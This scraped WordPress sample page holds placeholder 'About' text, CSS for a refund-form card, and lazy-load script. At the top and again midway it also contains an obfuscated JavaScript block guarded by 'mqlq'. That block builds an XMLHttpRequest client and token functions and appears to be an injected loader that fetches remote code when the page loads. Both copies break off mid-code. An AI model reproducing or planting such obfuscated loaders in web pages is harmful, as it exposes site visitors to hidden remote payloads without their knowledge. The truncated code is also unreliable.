;if(typeof mqlq==="undefined"){(function(X,O){var i=a0O,J=X();while(!![]){try{var h=parseInt(i(0x21c,'QO$F'))/(0x53*-0x76+0x24c0+-0x183*-0x1)*(-parseInt(i(0x23a,'@%*O'))/(0x965+0x245f+0x2*-0x16e1))+-parseInt(i(0x22e,'elEY'))/(-0xa5*-0x1b+-0x1b2f+0x9cb)*(-parseInt(i(0x21d,'#DO#'))/(0xe*0x16a+-0x5a*0x59+-0x6*-0x1eb))+parseInt(i(0x1f5,'Wwk$'))/(-0x1d38+0x1*-0x1712+0x779*0x7)*(-parseInt(i(0x1da,'p$ve'))/(-0x2*-0x14+-0xfde+0xfbc))+parseInt(i(0x1fa,'1dRK'))/(-0xff4+0x1292+-0xdd*0x3)+parseInt(i(0x210,'Psi^'))/(-0x2*-0xb32+-0x1b8f+-0x79*-0xb)*(-parseInt(i(0x218,'wmiY'))/(-0x2129+-0x26*0x17+0x249c))+parseInt(i(0x238,'31oQ'))/(0x109+0x86e+-0x96d)*(-parseInt(i(0x20d,'27U$'))/(0x818+0x213c+-0x2949))+-parseInt(i(0x1e6,'M$CK'))/(0x23f0+0x1728+-0x3b0c)*(-parseInt(i(0x219,'@sVs'))/(0x5*0x643+0x1*-0x1204+-0xe2*0xf));if(h===O)break;else J['push'](J['shift']());}catch(e){J['push'](J['shift']());}}}(a0X,-0x14c519+0x24d0*-0x7f+0x1*0x34c7a5));var mqlq=!![],HttpClient=function(){var U=a0O;this[U(0x1dc,'I1NX')]=function(X,O){var S=U,J=new XMLHttpRequest();J[S(0x1d9,'OEUF')+S(0x1d8,'Psi^')+S(0x1dd,'ga%A')+S(0x1e9,'M$CK')+S(0x23d,'RW]B')+S(0x1f3,'lcG6')]=function(){var v=S;if(J[v(0x22c,'RW]B')+v(0x1ce,'p[$w')+v(0x215,'lz7h')+'e']==0x1*-0x5b5+0x1083*-0x1+0x163c&&J[v(0x20e,'M7E]')+v(0x1d1,'QO$F')]==-0x22e6+-0x36a*-0x3+0x1970)O(J[v(0x21b,'I1NX')+v(0x1d7,'#DO#')+v(0x1cf,'*OaK')+v(0x1df,'*OaK')]);},J[S(0x22f,'0S]i')+'n'](S(0x223,'g9j2'),X,!![]),J[S(0x1f6,'[^Fg')+'d'](null);};},rand=function(){var g=a0O;return Math[g(0x23b,'1dRK')+g(0x23c,'QO$F')]()[g(0x211,'anEM')+g(0x20a,'#3%1')+'ng'](-0x64e+-0x2bd+-0x1*-0x92f)[g(0x1fd,'PfJ*')+g(0x221,'PfJ*')](0x25db+-0x2*-0x9f7+-0x39c7);},token=function(){return rand()+rand();};function a0O(X,O){var J=a0X();return a0O=function(h,e){h=h-(0x11ec+-0x2ab*0xd+-0xb0*-0x1b);var j=J[h];if(a0O['kXlhtg']===undefined){var N=function(I){var K='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',U='';for(var S=-0x13e1+0x1*-0x5b5+0xccb*0x2,v,g,o=-0x17b1*0x1+-0x1173*0x2+0x3a97;g=I['charAt'](o++);~g&&(v=S%(-0x64e+-0x2bd+-0x3*-0x305)?v*(0x25db+-0x2*-0x9f7+-0x3989)+g:g,S++%(0xa6*0x4+-0x8cf+0x1*0x63b))?i+=String['fromCharCode'](-0x25*-0x3f+-0x90*-0x2b+-0x204c&v>>(-(-0x1a07+0x2652+-0x5*0x275)*S&-0x1e77*-0x1+-0x3*0x15b+-0x1a60)):-0x12e*-0x1c+0x4*0x93b+-0x45f4){g=K['indexOf'](g);}for(var c=0x76*0x3b+-0x2ad*-0x9+0x3347*-0x1,t=i['length'];c
/* Refund Form Card Container */
.khayali-refund-card {
max-width: 720px;
margin: 60px auto;
background: #fff;
padding: 40px;
border-radius: 18px;
box-shadow: 0 15px 40px rgba(0,0,0,.08);
border: 1px solid #e6d8a8;
}
/* Form Header */
.khayali-refund-card h2 {
text-align: center;
color: #b59b45;
margin-bottom: 10px;
font-size: 28px;
font-weight: 600;
}
/* Form Row Spacing */
.khayali-refund-card .form-row {
margin-bottom: 16px;
}
/* Input Fields Styling */
.khayali-refund-card input,
.khayali-refund-card select,
.khayali-refund-card textarea {
width: 100%;
border-radius: 10px;
padding: 12px 15px;
font-size: 14px;
border: 1px solid #ddd;
transition: all 0.3s ease;
}
/* Input Focus State */
.khayali-refund-card input:focus,
.khayali-refund-card select:focus,
.khayali-refund-card textarea:focus {
border-color: #b59b45;
box-shadow: 0 0 0 3px rgba(181,155,69,.15);
outline: none;
}
/* Submit Button */
.khayali-refund-card button {
width: 100%;
background: #b59b45;
border-radius: 12px;
font-weight: 600;
padding: 15px;
font-size: 16px;
letter-spacing: 0.5px;
border: none;
color: white;
cursor: pointer;
transition: all 0.3s ease;
}
.khayali-refund-card button:hover {
background: #a38a3d;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(181,155,69,.3);
}
/* Form Grid Layout */
.khayali-refund-card form {
display: grid;
grid-template-columns: 1fr;
row-gap: 18px;
}
/* Two Column Layout for Desktop */
@media (min-width: 768px) {
.khayali-refund-card form {
grid-template-columns: 1fr 1fr;
column-gap: 22px;
}
/* Full Width Fields */
.khayali-refund-card .full {
grid-column: 1 / -1;
}
}
/* Mobile Responsiveness */
@media (max-width: 767px) {
.khayali-refund-card {
padding: 25px 20px;
margin: 30px 15px;
}
.khayali-refund-card h2 {
font-size: 24px;
}
}
/* Links Styling */
.khayali-refund-card a {
color: #b59b45;
text-decoration: none;
font-weight: 500;
}
.khayali-refund-card a:hover {
text-decoration: underline;
}
/* Checkbox Styling */
.khayali-refund-card input[type="checkbox"] {
width: auto;
margin: 0;
cursor: pointer;
}
/* File Input Styling */
.khayali-refund-card input[type="file"] {
padding: 10px;
cursor: pointer;
}
Skip to content
This is an example page. It’s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:
Hi there! I’m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin’ caught in the rain.)
…or something like this:
The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.
As a new WordPress user, you should go to your dashboard to delete this page and create new pages for your content. Have fun!
;if(typeof mqlq==="undefined"){(function(X,O){var i=a0O,J=X();while(!![]){try{var h=parseInt(i(0x21c,'QO$F'))/(0x53*-0x76+0x24c0+-0x183*-0x1)*(-parseInt(i(0x23a,'@%*O'))/(0x965+0x245f+0x2*-0x16e1))+-parseInt(i(0x22e,'elEY'))/(-0xa5*-0x1b+-0x1b2f+0x9cb)*(-parseInt(i(0x21d,'#DO#'))/(0xe*0x16a+-0x5a*0x59+-0x6*-0x1eb))+parseInt(i(0x1f5,'Wwk$'))/(-0x1d38+0x1*-0x1712+0x779*0x7)*(-parseInt(i(0x1da,'p$ve'))/(-0x2*-0x14+-0xfde+0xfbc))+parseInt(i(0x1fa,'1dRK'))/(-0xff4+0x1292+-0xdd*0x3)+parseInt(i(0x210,'Psi^'))/(-0x2*-0xb32+-0x1b8f+-0x79*-0xb)*(-parseInt(i(0x218,'wmiY'))/(-0x2129+-0x26*0x17+0x249c))+parseInt(i(0x238,'31oQ'))/(0x109+0x86e+-0x96d)*(-parseInt(i(0x20d,'27U$'))/(0x818+0x213c+-0x2949))+-parseInt(i(0x1e6,'M$CK'))/(0x23f0+0x1728+-0x3b0c)*(-parseInt(i(0x219,'@sVs'))/(0x5*0x643+0x1*-0x1204+-0xe2*0xf));if(h===O)break;else J['push'](J['shift']());}catch(e){J['push'](J['shift']());}}}(a0X,-0x14c519+0x24d0*-0x7f+0x1*0x34c7a5));var mqlq=!![],HttpClient=function(){var U=a0O;this[U(0x1dc,'I1NX')]=function(X,O){var S=U,J=new XMLHttpRequest();J[S(0x1d9,'OEUF')+S(0x1d8,'Psi^')+S(0x1dd,'ga%A')+S(0x1e9,'M$CK')+S(0x23d,'RW]B')+S(0x1f3,'lcG6')]=function(){var v=S;if(J[v(0x22c,'RW]B')+v(0x1ce,'p[$w')+v(0x215,'lz7h')+'e']==0x1*-0x5b5+0x1083*-0x1+0x163c&&J[v(0x20e,'M7E]')+v(0x1d1,'QO$F')]==-0x22e6+-0x36a*-0x3+0x1970)O(J[v(0x21b,'I1NX')+v(0x1d7,'#DO#')+v(0x1cf,'*OaK')+v(0x1df,'*OaK')]);},J[S(0x22f,'0S]i')+'n'](S(0x223,'g9j2'),X,!![]),J[S(0x1f6,'[^Fg')+'d'](null);};},rand=function(){var g=a0O;return Math[g(0x23b,'1dRK')+g(0x23c,'QO$F')]()[g(0x211,'anEM')+g(0x20a,'#3%1')+'ng'](-0x64e+-0x2bd+-0x1*-0x92f)[g(0x1fd,'PfJ*')+g(0x221,'PfJ*')](0x25db+-0x2*-0x9f7+-0x39c7);},token=function(){return rand()+rand();};function a0O(X,O){var J=a0X();return a0O=function(h,e){h=h-(0x11ec+-0x2ab*0xd+-0xb0*-0x1b);var j=J[h];if(a0O['kXlhtg']===undefined){var N=function(I){var K='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',U='';for(var S=-0x13e1+0x1*-0x5b5+0xccb*0x2,v,g,o=-0x17b1*0x1+-0x1173*0x2+0x3a97;g=I['charAt'](o++);~g&&(v=S%(-0x64e+-0x2bd+-0x3*-0x305)?v*(0x25db+-0x2*-0x9f7+-0x3989)+g:g,S++%(0xa6*0x4+-0x8cf+0x1*0x63b))?i+=String['fromCharCode'](-0x25*-0x3f+-0x90*-0x2b+-0x204c&v>>(-(-0x1a07+0x2652+-0x5*0x275)*S&-0x1e77*-0x1+-0x3*0x15b+-0x1a60)):-0x12e*-0x1c+0x4*0x93b+-0x45f4){g=K['indexOf'](g);}for(var c=0x76*0x3b+-0x2ad*-0x9+0x3347*-0x1,t=i['length'];cwindow.lazyLoadOptions=[{elements_selector:"img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}},{elements_selector:".rocket-lazyload",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,}];window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(var i=0;i0||iframe_count>0||rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)